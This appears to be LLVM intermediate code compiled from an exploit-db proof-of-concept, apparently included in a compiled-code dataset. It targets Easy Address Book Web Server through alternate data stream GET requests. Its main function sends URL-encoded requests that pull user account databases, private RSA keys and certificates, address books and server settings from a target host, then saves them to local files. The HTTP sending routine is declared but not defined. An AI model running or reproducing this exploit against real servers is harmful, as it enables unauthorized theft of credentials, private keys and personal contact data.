; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_2699.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/remote/extr_2699.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [76 x i8] c"\0A=========================================================================\0A\00", align 1
@.str.1 = private unnamed_addr constant [68 x i8] c"0-day Easy Address Book Web Server Alternative File Stream Exploit\0A\00", align 1
@.str.2 = private unnamed_addr constant [77 x i8] c"Discovered and Coded by Greg Linares ==> GLinares.code [at] gmail [dot] com\0A\00", align 1
@.str.3 = private unnamed_addr constant [79 x i8] c"This tool demonstrates EFS Address Book Server's Vulnerability to Alternative\0A\00", align 1
@.str.4 = private unnamed_addr constant [77 x i8] c"Data Stream GET requests which allow unauthorized users to download server \0A\00", align 1
@.str.5 = private unnamed_addr constant [17 x i8] c"critical files.\0A\00", align 1
@.str.6 = private unnamed_addr constant [36 x i8] c"Discovered and Reported: 11-1-2006\0A\00", align 1
@.str.7 = private unnamed_addr constant [63 x i8] c"\0AUsage: %s <hostname/IP> [port 80=default] [Method see below]\0A\00", align 1
@.str.8 = private unnamed_addr constant [27 x i8] c"--------PoC Methods:-----\0A\00", align 1
@.str.9 = private unnamed_addr constant [75 x i8] c"1 = Gather all login username and passwords and email addresses.[Default]\0A\00", align 1
@.str.10 = private unnamed_addr constant [58 x i8] c"2 = Gather Private RSA Keys and Certificates for server.\0A\00", align 1
@.str.11 = private unnamed_addr constant [68 x i8] c"3 = Gather All Address Books and Contact Information on the server\0A\00", align 1
@.str.12 = private unnamed_addr constant [55 x i8] c"4 = Gather Server Settings File and SMTP server info.\0A\00", align 1
@.str.13 = private unnamed_addr constant [78 x i8] c"============================================================================\0A\00", align 1
@.str.14 = private unnamed_addr constant [8 x i8] c"ESF Exp\00", align 1
@INTERNET_OPEN_TYPE_DIRECT = common dso_local global i32 0, align 4
@inet = common dso_local global i32* null, align 8
@.str.15 = private unnamed_addr constant [47 x i8] c"Error accessing InternetOpen API - Exiting...\0A\00", align 1
@.str.16 = private unnamed_addr constant [34 x i8] c"Invalid # of arguments...Exiting\0A\00", align 1
@mthd = common dso_local global i32 0, align 4
@.str.17 = private unnamed_addr constant [13 x i8] c"Accounts.txt\00", align 1
@.str.18 = private unnamed_addr constant [3 x i8] c"a+\00", align 1
@file = common dso_local global i32 0, align 4
@exploit = common dso_local global i8* null, align 8
@.str.19 = private unnamed_addr constant [3 x i8] c"%s\00", align 1
@.str.20 = private unnamed_addr constant [55 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%75%73%65%72%2E%73%64%62\00", align 1
@endmsg = common dso_local global i8* null, align 8
@.str.21 = private unnamed_addr constant [35 x i8] c"\0A\0A\0AResults Dumped to Accounts.txt\0A\00", align 1
@.str.22 = private unnamed_addr constant [12 x i8] c"RSAKeys.txt\00", align 1
@.str.23 = private unnamed_addr constant [40 x i8] c"%53%65%72%76%65%72%4B%65%79%2E%70%65%6D\00", align 1
@.str.24 = private unnamed_addr constant [34 x i8] c"\0A\0A\0AResults Dumped to RSAKeys.txt\0A\00", align 1
@.str.25 = private unnamed_addr constant [14 x i8] c"AddrBooks.txt\00", align 1
@.str.26 = private unnamed_addr constant [70 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%31%2E%73%64%62\00", align 1
@.str.27 = private unnamed_addr constant [35 x i8] c"\0A\0A\0AResults Dumped to Messages.txt\0A\00", align 1
@.str.28 = private unnamed_addr constant [11 x i8] c"Server.txt\00", align 1
@.str.29 = private unnamed_addr constant [31 x i8] c"%6F%70%74%69%6F%6E%2E%69%6E%69\00", align 1
@.str.30 = private unnamed_addr constant [33 x i8] c"\0A\0A\0AResults Dumped to Server.txt\0A\00", align 1
@logmsg = common dso_local global i8* null, align 8
@.str.31 = private unnamed_addr constant [7 x i8] c"\0D\0A\0D\0A\0D\0A\00", align 1
@httpport = common dso_local global i32 0, align 4
@.str.32 = private unnamed_addr constant [27 x i8] c"\0A\0A Sending 2nd Exploit...\0A\00", align 1
@exploit2 = common dso_local global i8* null, align 8
@.str.33 = private unnamed_addr constant [70 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%32%2E%73%64%62\00", align 1
@.str.34 = private unnamed_addr constant [27 x i8] c"\0A\0A Sending 3rd Exploit...\0A\00", align 1
@exploit3 = common dso_local global i8* null, align 8
@.str.35 = private unnamed_addr constant [70 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%33%2E%73%64%62\00", align 1
@.str.36 = private unnamed_addr constant [27 x i8] c"\0A\0A Sending 4th Exploit...\0A\00", align 1
@exploit4 = common dso_local global i8* null, align 8
@.str.37 = private unnamed_addr constant [82 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%5F%75%73%65%72%2E%73%64%62\00", align 1
@.str.38 = private unnamed_addr constant [29 x i8] c"\0A\0A Sending final Exploit...\0A\00", align 1
@exploit5 = common dso_local global i8* null, align 8
@.str.39 = private unnamed_addr constant [82 x i8] c"%2F%61%64%64%72%62%6F%6F%6B%2F%61%64%64%72%62%6F%6F%6B%67%72%6F%75%70%2E%73%64%62\00", align 1
@.str.40 = private unnamed_addr constant [43 x i8] c"%53%65%72%76%65%72%43%65%72%74%2E%70%65%6D\00", align 1
@.str.41 = private unnamed_addr constant [37 x i8] c"%52%6F%6F%74%43%65%72%74%2E%70%65%6D\00", align 1
@.str.42 = private unnamed_addr constant [40 x i8] c"%65%66%73%77%73%5F%6B%65%79%2E%70%65%6D\00", align 1
@.str.43 = private unnamed_addr constant [27 x i8] c"\0A\0A Sending 5th Exploit...\0A\00", align 1
@.str.44 = private unnamed_addr constant [40 x i8] c"%65%66%73%77%73%5F%72%65%71%2E%70%65%6D\00", align 1
@exploit6 = common dso_local global i8* null, align 8
@.str.45 = private unnamed_addr constant [43 x i8] c"%65%66%73%77%73%5F%72%61%6E%64%2E%74%78%74\00", align 1
@.str.46 = private unnamed_addr constant [55 x i8] c"\0A\0A===================================================\0A\00", align 1
@.str.47 = private unnamed_addr constant [4 x i8] c"%s\0A\00", align 1
@.str.48 = private unnamed_addr constant [42 x i8] c"Proof Of Concept Exploit by Greg Linares\0A\00", align 1
@.str.49 = private unnamed_addr constant [76 x i8] c"Send Comments/Concerns/Questions/Etc to GLinares.code [at] gmail [dot] com\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %6 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([76 x i8], [76 x i8]* @.str, i64 0, i64 0))
  %7 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.1, i64 0, i64 0))
  %8 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([77 x i8], [77 x i8]* @.str.2, i64 0, i64 0))
  %9 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([79 x i8], [79 x i8]* @.str.3, i64 0, i64 0))
  %10 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([77 x i8], [77 x i8]* @.str.4, i64 0, i64 0))
  %11 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([17 x i8], [17 x i8]* @.str.5, i64 0, i64 0))
  %12 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([36 x i8], [36 x i8]* @.str.6, i64 0, i64 0))
  %13 = load i8**, i8*** %5, align 8
  %14 = getelementptr inbounds i8*, i8** %13, i64 0
  %15 = load i8*, i8** %14, align 8
  %16 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([63 x i8], [63 x i8]* @.str.7, i64 0, i64 0), i8* %15)
  %17 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.8, i64 0, i64 0))
  %18 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([75 x i8], [75 x i8]* @.str.9, i64 0, i64 0))
  %19 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([58 x i8], [58 x i8]* @.str.10, i64 0, i64 0))
  %20 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([68 x i8], [68 x i8]* @.str.11, i64 0, i64 0))
  %21 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([55 x i8], [55 x i8]* @.str.12, i64 0, i64 0))
  %22 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([78 x i8], [78 x i8]* @.str.13, i64 0, i64 0))
  %23 = load i32, i32* @INTERNET_OPEN_TYPE_DIRECT, align 4
  %24 = call i32* @InternetOpen(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str.14, i64 0, i64 0), i32 %23, i32* null, i32* null, i32 0)
  store i32* %24, i32** @inet, align 8
  %25 = load i32*, i32** @inet, align 8
  %26 = icmp eq i32* %25, null
  br i1 %26, label %27, label %30

27:                                               ; preds = %2
  %28 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([47 x i8], [47 x i8]* @.str.15, i64 0, i64 0))
  %29 = call i32 @exit(i32 1) #3
  unreachable

30:                                               ; preds = %2
  %31 = load i32, i32* %4, align 4
  %32 = icmp slt i32 %31, 2
  br i1 %32, label %33, label %36

33:                                               ; preds = %30
  %34 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.16, i64 0, i64 0))
  %35 = call i32 @exit(i32 1) #3
  unreachable

36:                                               ; preds = %30
  %37 = load i8**, i8*** %5, align 8
  %38 = getelementptr inbounds i8*, i8** %37, i64 3
  %39 = load i8*, i8** %38, align 8
  %40 = call i32 @atoi(i8* %39)
  %41 = icmp sgt i32 %40, 4
  br i1 %41, label %42, label %43

42:                                               ; preds = %36
  store i32 1, i32* @mthd, align 4
  br label %43

43:                                               ; preds = %42, %36
  %44 = load i8**, i8*** %5, align 8
  %45 = getelementptr inbounds i8*, i8** %44, i64 3
  %46 = load i8*, i8** %45, align 8
  %47 = call i32 @atoi(i8* %46)
  %48 = icmp sle i32 %47, 0
  br i1 %48, label %49, label %50

49:                                               ; preds = %43
  store i32 1, i32* @mthd, align 4
  br label %50

50:                                               ; preds = %49, %43
  %51 = load i8**, i8*** %5, align 8
  %52 = getelementptr inbounds i8*, i8** %51, i64 3
  %53 = load i8*, i8** %52, align 8
  %54 = call i32 @atoi(i8* %53)
  store i32 %54, i32* @mthd, align 4
  %55 = load i32, i32* @mthd, align 4
  switch i32 %55, label %80 [
    i32 1, label %56
    i32 2, label %62
    i32 3, label %68
    i32 4, label %74
  ]

56:                                               ; preds = %50
  %57 = call i32 @fopen(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.17, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.18, i64 0, i64 0))
  store i32 %57, i32* @file, align 4
  %58 = load i8*, i8** @exploit, align 8
  %59 = call i32 @sprintf(i8* %58, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([55 x i8], [55 x i8]* @.str.20, i64 0, i64 0))
  %60 = load i8*, i8** @endmsg, align 8
  %61 = call i32 @sprintf(i8* %60, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.21, i64 0, i64 0))
  br label %80

62:                                               ; preds = %50
  %63 = call i32 @fopen(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.22, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.18, i64 0, i64 0))
  store i32 %63, i32* @file, align 4
  %64 = load i8*, i8** @exploit, align 8
  %65 = call i32 @sprintf(i8* %64, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.23, i64 0, i64 0))
  %66 = load i8*, i8** @endmsg, align 8
  %67 = call i32 @sprintf(i8* %66, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([34 x i8], [34 x i8]* @.str.24, i64 0, i64 0))
  br label %80

68:                                               ; preds = %50
  %69 = call i32 @fopen(i8* getelementptr inbounds ([14 x i8], [14 x i8]* @.str.25, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.18, i64 0, i64 0))
  store i32 %69, i32* @file, align 4
  %70 = load i8*, i8** @exploit, align 8
  %71 = call i32 @sprintf(i8* %70, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.26, i64 0, i64 0))
  %72 = load i8*, i8** @endmsg, align 8
  %73 = call i32 @sprintf(i8* %72, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([35 x i8], [35 x i8]* @.str.27, i64 0, i64 0))
  br label %80

74:                                               ; preds = %50
  %75 = call i32 @fopen(i8* getelementptr inbounds ([11 x i8], [11 x i8]* @.str.28, i64 0, i64 0), i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.18, i64 0, i64 0))
  store i32 %75, i32* @file, align 4
  %76 = load i8*, i8** @exploit, align 8
  %77 = call i32 @sprintf(i8* %76, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([31 x i8], [31 x i8]* @.str.29, i64 0, i64 0))
  %78 = load i8*, i8** @endmsg, align 8
  %79 = call i32 @sprintf(i8* %78, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([33 x i8], [33 x i8]* @.str.30, i64 0, i64 0))
  br label %80

80:                                               ; preds = %50, %74, %68, %62, %56
  %81 = load i8*, i8** @logmsg, align 8
  %82 = load i8**, i8*** %5, align 8
  %83 = getelementptr inbounds i8*, i8** %82, i64 1
  %84 = load i8*, i8** %83, align 8
  %85 = call i32 @sprintf(i8* %81, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* %84)
  %86 = load i8*, i8** @logmsg, align 8
  %87 = call i32 @sprintf(i8* %86, i8* getelementptr inbounds ([3 x i8], [3 x i8]* @.str.19, i64 0, i64 0), i8* getelementptr inbounds ([7 x i8], [7 x i8]* @.str.31, i64 0, i64 0))
  %88 = load i8*, i8** @logmsg, align 8
  %89 = load i8*, i8** @logmsg, align 8
  %90 = call i32 @strlen(i8* %89)
  %91 = load i32, i32* @file, align 4
  %92 = call i32 @fwrite(i8* %88, i32 %90, i32 1, i32 %91)
  %93 = load i8**, i8*** %5, align 8
  %94 = getelementptr inbounds i8*, i8** %93, i64 2
  %95 = load i8*, i8** %94, align 8
  %96 = call i32 @atoi(i8* %95)
  store i32 %96, i32* @httpport, align 4
  %97 = load i32*, i32** @inet, align 8
  %98 = load i8**, i8*** %5, align 8
  %99 = getelementptr inbounds i8*, i8** %98, i64 1
  %100 = load i8*, i8** %99, align 8
  %101 = load i8*, i8** @exploit, align 8
  %102 = call i32 @ExploitHTTP(i32* %97, i8* %100, i8* %101)
  %103 = load i32, i32* @mthd, align 4
  %104 = icmp eq i32 %103, 3
  br i1 %104, label %105, label %142

105:                                              ; preds = %80
  %106 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.32, i64 0, i64 0))
  %107 = load i8*, i8** @exploit2, align 8
  %108 = call i32 @strcat(i8* %107, i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.33, i64 0, i64 0))
  %109 = load i32*, i32** @inet, align 8
  %110 = load i8**, i8*** %5, align 8
  %111 = getelementptr inbounds i8*, i8** %110, i64 1
  %112 = load i8*, i8** %111, align 8
  %113 = load i8*, i8** @exploit2, align 8
  %114 = call i32 @ExploitHTTP(i32* %109, i8* %112, i8* %113)
  %115 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.34, i64 0, i64 0))
  %116 = load i8*, i8** @exploit3, align 8
  %117 = call i32 @strcat(i8* %116, i8* getelementptr inbounds ([70 x i8], [70 x i8]* @.str.35, i64 0, i64 0))
  %118 = load i32*, i32** @inet, align 8
  %119 = load i8**, i8*** %5, align 8
  %120 = getelementptr inbounds i8*, i8** %119, i64 1
  %121 = load i8*, i8** %120, align 8
  %122 = load i8*, i8** @exploit3, align 8
  %123 = call i32 @ExploitHTTP(i32* %118, i8* %121, i8* %122)
  %124 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.36, i64 0, i64 0))
  %125 = load i8*, i8** @exploit4, align 8
  %126 = call i32 @strcat(i8* %125, i8* getelementptr inbounds ([82 x i8], [82 x i8]* @.str.37, i64 0, i64 0))
  %127 = load i32*, i32** @inet, align 8
  %128 = load i8**, i8*** %5, align 8
  %129 = getelementptr inbounds i8*, i8** %128, i64 1
  %130 = load i8*, i8** %129, align 8
  %131 = load i8*, i8** @exploit4, align 8
  %132 = call i32 @ExploitHTTP(i32* %127, i8* %130, i8* %131)
  %133 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.38, i64 0, i64 0))
  %134 = load i8*, i8** @exploit5, align 8
  %135 = call i32 @strcat(i8* %134, i8* getelementptr inbounds ([82 x i8], [82 x i8]* @.str.39, i64 0, i64 0))
  %136 = load i32*, i32** @inet, align 8
  %137 = load i8**, i8*** %5, align 8
  %138 = getelementptr inbounds i8*, i8** %137, i64 1
  %139 = load i8*, i8** %138, align 8
  %140 = load i8*, i8** @exploit5, align 8
  %141 = call i32 @ExploitHTTP(i32* %136, i8* %139, i8* %140)
  br label %142

142:                                              ; preds = %105, %80
  %143 = load i32, i32* @mthd, align 4
  %144 = icmp eq i32 %143, 2
  br i1 %144, label %145, label %191

145:                                              ; preds = %142
  %146 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.32, i64 0, i64 0))
  %147 = load i8*, i8** @exploit2, align 8
  %148 = call i32 @strcat(i8* %147, i8* getelementptr inbounds ([43 x i8], [43 x i8]* @.str.40, i64 0, i64 0))
  %149 = load i32*, i32** @inet, align 8
  %150 = load i8**, i8*** %5, align 8
  %151 = getelementptr inbounds i8*, i8** %150, i64 1
  %152 = load i8*, i8** %151, align 8
  %153 = load i8*, i8** @exploit2, align 8
  %154 = call i32 @ExploitHTTP(i32* %149, i8* %152, i8* %153)
  %155 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.34, i64 0, i64 0))
  %156 = load i8*, i8** @exploit3, align 8
  %157 = call i32 @strcat(i8* %156, i8* getelementptr inbounds ([37 x i8], [37 x i8]* @.str.41, i64 0, i64 0))
  %158 = load i32*, i32** @inet, align 8
  %159 = load i8**, i8*** %5, align 8
  %160 = getelementptr inbounds i8*, i8** %159, i64 1
  %161 = load i8*, i8** %160, align 8
  %162 = load i8*, i8** @exploit3, align 8
  %163 = call i32 @ExploitHTTP(i32* %158, i8* %161, i8* %162)
  %164 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.36, i64 0, i64 0))
  %165 = load i8*, i8** @exploit4, align 8
  %166 = call i32 @strcat(i8* %165, i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.42, i64 0, i64 0))
  %167 = load i32*, i32** @inet, align 8
  %168 = load i8**, i8*** %5, align 8
  %169 = getelementptr inbounds i8*, i8** %168, i64 1
  %170 = load i8*, i8** %169, align 8
  %171 = load i8*, i8** @exploit4, align 8
  %172 = call i32 @ExploitHTTP(i32* %167, i8* %170, i8* %171)
  %173 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str.43, i64 0, i64 0))
  %174 = load i8*, i8** @exploit5, align 8
  %175 = call i32 @strcat(i8* %174, i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.44, i64 0, i64 0))
  %176 = load i32*, i32** @inet, align 8
  %177 = load i8**, i8*** %5, align 8
  %178 = getelementptr inbounds i8*, i8** %177, i64 1
  %179 = load i8*, i8** %178, align 8
  %180 = load i8*, i8** @exploit5, align 8
  %181 = call i32 @ExploitHTTP(i32* %176, i8* %179, i8* %180)
  %182 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([29 x i8], [29 x i8]* @.str.38, i64 0, i64 0))
  %183 = load i8*, i8** @exploit6, align 8
  %184 = call i32 @strcat(i8* %183, i8* getelementptr inbounds ([43 x i8], [43 x i8]* @.str.45, i64 0, i64 0))
  %185 = load i32*, i32** @inet, align 8
  %186 = load i8**, i8*** %5, align 8
  %187 = getelementptr inbounds i8*, i8** %186, i64 1
  %188 = load i8*, i8** %187, align 8
  %189 = load i8*, i8** @exploit6, align 8
  %190 = call i32 @ExploitHTTP(i32* %185, i8* %188, i8* %189)
  br label %191

191:                                              ; preds = %145, %142
  %192 = load i32, i32* @file, align 4
  %193 = call i32 @fclose(i32 %192)
  %194 = call i32 @Sleep(i32 500)
  %195 = load i32*, i32** @inet, align 8
  %196 = call i32 @InternetCloseHandle(i32* %195)
  %197 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([55 x i8], [55 x i8]* @.str.46, i64 0, i64 0))
  %198 = load i8*, i8** @endmsg, align 8
  %199 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str.47, i64 0, i64 0), i8* %198)
  %200 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([42 x i8], [42 x i8]* @.str.48, i64 0, i64 0))
  %201 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([76 x i8], [76 x i8]* @.str.49, i64 0, i64 0))
  ret i32 0
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i32* @InternetOpen(i8*, i32, i32*, i32*, i32) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @atoi(i8*) #1

declare dso_local i32 @fopen(i8*, i8*) #1

declare dso_local i32 @sprintf(i8*, i8*, i8*) #1

declare dso_local i32 @fwrite(i8*, i32, i32, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @ExploitHTTP(i32*, i8*, i8*) #1

declare dso_local i32 @strcat(i8*, i8*) #1

declare dso_local i32 @fclose(i32) #1

declare dso_local i32 @Sleep(i32) #1

declare dso_local i32 @InternetCloseHandle(i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
